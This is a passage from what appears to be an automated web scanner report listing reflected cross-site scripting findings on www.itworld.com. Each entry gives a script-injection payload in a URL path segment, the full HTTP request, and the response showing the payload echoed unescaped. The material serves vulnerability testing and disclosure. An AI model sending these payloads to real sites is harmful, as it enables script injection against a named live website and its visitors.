s.prop14="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites5ae7e"-alert(1)-"e551714aab2/all/modules/contrib/hoverintent/js/jquery.hoverIntent.minified.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12=
...[SNIP]...

1.181. http://www.itworld.com/sites/all/modules/contrib/hoverintent/js/jquery.hoverIntent.minified.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/hoverintent/js/jquery.hoverIntent.minified.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81e41"><script>alert(1)</script>24ba1609dfe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites81e41"><script>alert(1)</script>24ba1609dfe/all/modules/contrib/hoverintent/js/jquery.hoverIntent.minified.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:20:19 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460019"
Content-Type: text/html; charset=utf-8
Content-Length: 57901
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:20:49 GMT
X-Varnish: 398321379
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=39a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites81e41"><script>alert(1)</script>24ba1609dfe/all/modules/contrib/hoverintent/js/jquery.hoverIntent.minified.js?h"/>
...[SNIP]...

1.182. http://www.itworld.com/sites/all/modules/contrib/hoverintent/js/jquery.hoverIntent.minified.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/hoverintent/js/jquery.hoverIntent.minified.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f28c"-alert(1)-"52d826dabff was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/contrib2f28c"-alert(1)-"52d826dabff/hoverintent/js/jquery.hoverIntent.minified.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:25:03 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460303"
Content-Type: text/html; charset=utf-8
Content-Length: 57685
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:25:35 GMT
X-Varnish: 1038159678
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
op14="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modules/contrib2f28c"-alert(1)-"52d826dabff/hoverintent/js/jquery.hoverIntent.minified.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't f
...[SNIP]...

1.183. http://www.itworld.com/sites/all/modules/contrib/hoverintent/js/jquery.hoverIntent.minified.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/hoverintent/js/jquery.hoverIntent.minified.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 488a8"><script>alert(1)</script>91614b245c3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/contrib/hoverintent488a8"><script>alert(1)</script>91614b245c3/js/jquery.hoverIntent.minified.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:25:55 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460355"
Content-Type: text/html; charset=utf-8
Content-Length: 57906
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:25:57 GMT
X-Varnish: 1038161335
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites/all/modules/contrib/hoverintent488a8"><script>alert(1)</script>91614b245c3/js/jquery.hoverIntent.minified.js?h"/>
...[SNIP]...

1.184. http://www.itworld.com/sites/all/modules/contrib/hoverintent/js/jquery.hoverIntent.minified.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/hoverintent/js/jquery.hoverIntent.minified.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5803"-alert(1)-"0c58f56291 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/contrib/hoverintenta5803"-alert(1)-"0c58f56291/js/jquery.hoverIntent.minified.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:26:11 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460371"
Content-Type: text/html; charset=utf-8
Content-Length: 57674
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:26:13 GMT
X-Varnish: 1038161763
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
h";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modules/contrib/hoverintenta5803"-alert(1)-"0c58f56291/js/jquery.hoverIntent.minified.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page
...[SNIP]...

1.185. http://www.itworld.com/sites/all/modules/contrib/hoverintent/js/jquery.hoverIntent.minified.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/hoverintent/js/jquery.hoverIntent.minified.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 785e0"><script>alert(1)</script>cd89cc431a0 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/contrib/hoverintent/js785e0"><script>alert(1)</script>cd89cc431a0/jquery.hoverIntent.minified.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:26:38 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460398"
Content-Type: text/html; charset=utf-8
Content-Length: 57905
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:26:39 GMT
X-Varnish: 1038162458
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites/all/modules/contrib/hoverintent/js785e0"><script>alert(1)</script>cd89cc431a0/jquery.hoverIntent.minified.js?h"/>
...[SNIP]...

1.186. http://www.itworld.com/sites/all/modules/contrib/hoverintent/js/jquery.hoverIntent.minified.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/hoverintent/js/jquery.hoverIntent.minified.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13695"-alert(1)-"af39c66884f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/contrib/hoverintent/js13695"-alert(1)-"af39c66884f/jquery.hoverIntent.minified.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:26:46 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460406"
Content-Type: text/html; charset=utf-8
Content-Length: 57685
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:26:49 GMT
X-Varnish: 1038162700
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...

s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modules/contrib/hoverintent/js13695"-alert(1)-"af39c66884f/jquery.hoverIntent.minified.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page yo
...[SNIP]...

1.187. http://www.itworld.com/sites/all/modules/contrib/hoverintent/js/jquery.hoverIntent.minified.js [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/hoverintent/js/jquery.hoverIntent.minified.js

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7836"><script>alert(1)</script>39538eb60b4 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/contrib/hoverintent/js/jquery.hoverIntent.minified.jsc7836"><script>alert(1)</script>39538eb60b4?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:26:57 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460417"
Content-Type: text/html; charset=utf-8
Content-Length: 57905
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:27:05 GMT
X-Varnish: 1038163159
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites/all/modules/contrib/hoverintent/js/jquery.hoverIntent.minified.jsc7836"><script>alert(1)</script>39538eb60b4?h"/>
...[SNIP]...

1.188. http://www.itworld.com/sites/all/modules/contrib/hoverintent/js/jquery.hoverIntent.minified.js [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/hoverintent/js/jquery.hoverIntent.minified.js

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 632f6"-alert(1)-"624fd73f6af was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/contrib/hoverintent/js/jquery.hoverIntent.minified.js632f6"-alert(1)-"624fd73f6af?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:27:09 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460429"
Content-Type: text/html; charset=utf-8
Content-Length: 57685
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:27:09 GMT
X-Varnish: 1038163451
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
6="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modules/contrib/hoverintent/js/jquery.hoverIntent.minified.js632f6"-alert(1)-"624fd73f6af";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you requested.";
s.eVar13="CMS";

...[SNIP]...

1.189. http://www.itworld.com/sites/all/modules/contrib/img_assist/img_assist.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/img_assist/img_assist.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b76a"><script>alert(1)</script>eac1e78b903 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites8b76a"><script>alert(1)</script>eac1e78b903/all/modules/contrib/img_assist/img_assist.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:19:52 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316459992"
Content-Type: text/html; charset=utf-8
Content-Length: 57686
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:19:53 GMT
X-Varnish: 1959722164
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/sites8b76a"><script>alert(1)</script>eac1e78b903/all/modules/contrib/img_assist/img_assist.js?h"/>
...[SNIP]...

1.190. http://www.itworld.com/sites/all/modules/contrib/img_assist/img_assist.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/img_assist/img_assist.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9adb1"-alert(1)-"6a1746327eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites9adb1"-alert(1)-"6a1746327eb/all/modules/contrib/img_assist/img_assist.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:20:08 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460008"
Content-Type: text/html; charset=utf-8
Content-Length: 57466
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:20:11 GMT
X-Varnish: 1959722685
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
s.prop13="CMS";
s.prop14="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites9adb1"-alert(1)-"6a1746327eb/all/modules/contrib/img_assist/img_assist.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't fi
...[SNIP]...

1.191. http://www.itworld.com/sites/all/modules/contrib/img_assist/img_assist.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/img_assist/img_assist.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35b6e"-alert(1)-"8b8b4107174 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/contrib35b6e"-alert(1)-"8b8b4107174/img_assist/img_assist.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:23:08 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460188"
Content-Type: text/html; charset=utf-8
Content-Length: 57472
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:23:14 GMT
X-Varnish: 252446948
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
op14="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/sites/all/modules/contrib35b6e"-alert(1)-"8b8b4107174/img_assist/img_assist.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you requ
...[SNIP]...

1.192. http://www.itworld.com/sites/all/modules/contrib/img_assist/img_assist.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /sites/all/modules/contrib/img_assist/img_assist.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71ac2"><script>alert(1)</script>c68568ceeea was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/contrib71ac2"><script>alert(1)</script>c68568ceeea/img_assist/img_assist.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:22:53 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460173"
Content-Type: text/html; charset=utf-8
Content-Length: 57686
X-Cacheable: NO: obj.status
